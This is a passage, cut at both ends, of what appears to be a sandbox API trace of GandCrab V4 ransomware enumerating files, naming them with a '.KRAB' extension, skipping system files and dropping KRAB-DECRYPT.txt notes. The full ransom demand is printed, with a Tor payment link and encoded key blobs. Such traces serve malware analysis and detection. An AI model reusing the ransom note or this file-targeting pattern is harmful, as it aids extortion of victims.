ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0041.417] WriteFile (in: hFile=0x28c, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f720, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f720*=0x1f6e, lpOverlapped=0x0) returned 1 [0041.418] CloseHandle (hObject=0x28c) returned 1 [0041.418] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.418] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.418] GetSystemTime (in: lpSystemTime=0x3030400 | out: lpSystemTime=0x3030400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2c, wSecond=0x30, wMilliseconds=0x26d)) [0041.418] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0041.418] GetWindowsDirectoryW (in: lpBuffer=0x3040000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0041.419] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3040200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x3040600, lpMaximumComponentLength=0x3040608, lpFileSystemFlags=0x3040604, lpFileSystemNameBuffer=0x3040400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x3040600*=0xd2ca4def, lpMaximumComponentLength=0x3040608*=0xff, lpFileSystemFlags=0x3040604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0041.419] wsprintfW (in: param_1=0x3030000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Documents and Settings\\d2ca4a08d2ca4dee3d.lock") returned 49 [0041.419] CreateFileW (lpFileName="C:\\Documents and Settings\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\documents and settings\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x28c [0041.419] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.420] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.420] lstrlenW (lpString="C:\\Documents and Settings\\") returned 26 [0041.420] lstrcatW (in: lpString1="C:\\Documents and Settings\\", lpString2="*" | out: lpString1="C:\\Documents and Settings\\*") returned="C:\\Documents and Settings\\*" [0041.420] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\*", lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 0xffffffff [0041.420] CloseHandle (hObject=0x28c) returned 1 [0041.420] FindNextFileW (in: hFindFile=0xf8a188, lpFindFileData=0x338f9d0 | out: lpFindFileData=0x338f9d0) returned 1 [0041.420] lstrcmpW (lpString1="hiberfil.sys", lpString2=".") returned 1 [0041.420] lstrcmpW (lpString1="hiberfil.sys", lpString2="..") returned 1 [0041.420] lstrcatW (in: lpString1="C:\\", lpString2="hiberfil.sys" | out: lpString1="C:\\hiberfil.sys") returned="C:\\hiberfil.sys" [0041.420] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.420] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\hiberfil.sys.KRAB") returned 20 [0041.421] lstrlenW (lpString="C:\\hiberfil.sys") returned 15 [0041.421] lstrlenW (lpString=".sys") returned 4 [0041.421] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0041.421] wsprintfW (in: param_1=0x3040000, param_2="%s " | out: param_1=".sys ") returned 5 [0041.421] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.421] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.421] FindNextFileW (in: hFindFile=0xf8a188, lpFindFileData=0x338f9d0 | out: lpFindFileData=0x338f9d0) returned 1 [0041.421] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0041.421] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0041.421] lstrcatW (in: lpString1="C:\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\KRAB-DECRYPT.txt") returned="C:\\KRAB-DECRYPT.txt" [0041.421] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.422] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\KRAB-DECRYPT.txt.KRAB") returned 24 [0041.422] lstrlenW (lpString="C:\\KRAB-DECRYPT.txt") returned 19 [0041.422] lstrlenW (lpString=".txt") returned 4 [0041.422] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0041.424] wsprintfW (in: param_1=0x3040000, param_2="%s " | out: param_1=".txt ") returned 5 [0041.424] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.425] lstrlenW (lpString="C:\\KRAB-DECRYPT.txt") returned 19 [0041.425] lstrlenW (lpString="C:\\KRAB-DECRYPT.txt") returned 19 [0041.425] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0041.425] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0041.425] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0041.425] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0041.425] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0041.425] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0041.425] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0041.425] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0041.425] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0041.425] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0041.425] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.425] FindNextFileW (in: hFindFile=0xf8a188, lpFindFileData=0x338f9d0 | out: lpFindFileData=0x338f9d0) returned 1 [0041.425] lstrcmpW (lpString1="pagefile.sys", lpString2=".") returned 1 [0041.425] lstrcmpW (lpString1="pagefile.sys", lpString2="..") returned 1 [0041.425] lstrcatW (in: lpString1="C:\\", lpString2="pagefile.sys" | out: lpString1="C:\\pagefile.sys") returned="C:\\pagefile.sys" [0041.425] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.425] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\pagefile.sys.KRAB") returned 20 [0041.425] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0041.425] lstrlenW (lpString=".sys") returned 4 [0041.425] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0041.426] wsprintfW (in: param_1=0x3040000, param_2="%s " | out: param_1=".sys ") returned 5 [0041.426] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.426] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.426] FindNextFileW (in: hFindFile=0xf8a188, lpFindFileData=0x338f9d0 | out: lpFindFileData=0x338f9d0) returned 1 [0041.426] lstrcmpW (lpString1="PerfLogs", lpString2=".") returned 1 [0041.426] lstrcmpW (lpString1="PerfLogs", lpString2="..") returned 1 [0041.426] lstrcatW (in: lpString1="C:\\", lpString2="PerfLogs" | out: lpString1="C:\\PerfLogs") returned="C:\\PerfLogs" [0041.426] lstrcatW (in: lpString1="C:\\PerfLogs", lpString2="\\" | out: lpString1="C:\\PerfLogs\\") returned="C:\\PerfLogs\\" [0041.426] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0041.426] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0041.426] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0041.427] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0041.427] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0041.427] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.427] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.427] wsprintfW (in: param_1=0x3030200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\PerfLogs\\\\KRAB-DECRYPT.txt") returned 29 [0041.427] CreateFileW (lpFileName="C:\\PerfLogs\\\\KRAB-DECRYPT.txt" (normalized: "c:\\perflogs\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28c [0041.428] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0041.428] WriteFile (in: hFile=0x28c, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f720, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f720*=0x1f6e, lpOverlapped=0x0) returned 1 [0041.431] CloseHandle (hObject=0x28c) returned 1 [0041.431] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.431] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.431] GetSystemTime (in: lpSystemTime=0x3030400 | out: lpSystemTime=0x3030400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2c, wSecond=0x30, wMilliseconds=0x27d)) [0041.432] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0041.432] GetWindowsDirectoryW (in: lpBuffer=0x3040000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0041.432] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3040200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x3040600, lpMaximumComponentLength=0x3040608, lpFileSystemFlags=0x3040604, lpFileSystemNameBuffer=0x3040400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x3040600*=0xd2ca4def, lpMaximumComponentLength=0x3040608*=0xff, lpFileSystemFlags=0x3040604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0041.432] wsprintfW (in: param_1=0x3030000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\PerfLogs\\d2ca4a08d2ca4dee3d.lock") returned 35 [0041.432] CreateFileW (lpFileName="C:\\PerfLogs\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\perflogs\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x28c [0041.432] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.433] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.433] lstrlenW (lpString="C:\\PerfLogs\\") returned 12 [0041.433] lstrcatW (in: lpString1="C:\\PerfLogs\\", lpString2="*" | out: lpString1="C:\\PerfLogs\\*") returned="C:\\PerfLogs\\*" [0041.433] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*", lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 0xf8a588 [0041.433] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0041.433] FindNextFileW (in: hFindFile=0xf8a588, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.433] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0041.433] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.433] FindNextFileW (in: hFindFile=0xf8a588, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.433] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0041.434] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0041.434] lstrcatW (in: lpString1="C:\\PerfLogs\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\PerfLogs\\d2ca4a08d2ca4dee3d.lock") returned="C:\\PerfLogs\\d2ca4a08d2ca4dee3d.lock" [0041.434] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.434] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\PerfLogs\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 40 [0041.434] lstrlenW (lpString="C:\\PerfLogs\\d2ca4a08d2ca4dee3d.lock") returned 35 [0041.434] lstrlenW (lpString=".lock") returned 5 [0041.434] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0041.434] wsprintfW (in: param_1=0x3040000, param_2="%s " | out: param_1=".lock ") returned 6 [0041.434] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.434] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.434] FindNextFileW (in: hFindFile=0xf8a588, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.435] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0041.435] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0041.435] lstrcatW (in: lpString1="C:\\PerfLogs\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\PerfLogs\\KRAB-DECRYPT.txt") returned="C:\\PerfLogs\\KRAB-DECRYPT.txt" [0041.435] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.435] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\PerfLogs\\KRAB-DECRYPT.txt.KRAB") returned 33 [0041.435] lstrlenW (lpString="C:\\PerfLogs\\KRAB-DECRYPT.txt") returned 28 [0041.435] lstrlenW (lpString=".txt") returned 4 [0041.435] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0041.435] wsprintfW (in: param_1=0x3040000, param_2="%s " | out: param_1=".txt ") returned 5 [0041.435] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.435] lstrlenW (lpString="C:\\PerfLogs\\KRAB-DECRYPT.txt") returned 28 [0041.435] lstrlenW (lpString="C:\\PerfLogs\\KRAB-DECRYPT.txt") returned 28 [0041.435] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0041.435] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0041.435] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0041.435] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0041.435] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0041.436] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0041.436] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0041.436] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0041.436] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0041.436] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0041.436] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.436] FindNextFileW (in: hFindFile=0xf8a588, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 0 [0041.436] FindClose (in: hFindFile=0xf8a588 | out: hFindFile=0xf8a588) returned 1 [0041.436] CloseHandle (hObject=0x28c) returned 1 [0041.436] FindNextFileW (in: hFindFile=0xf8a188, lpFindFileData=0x338f9d0 | 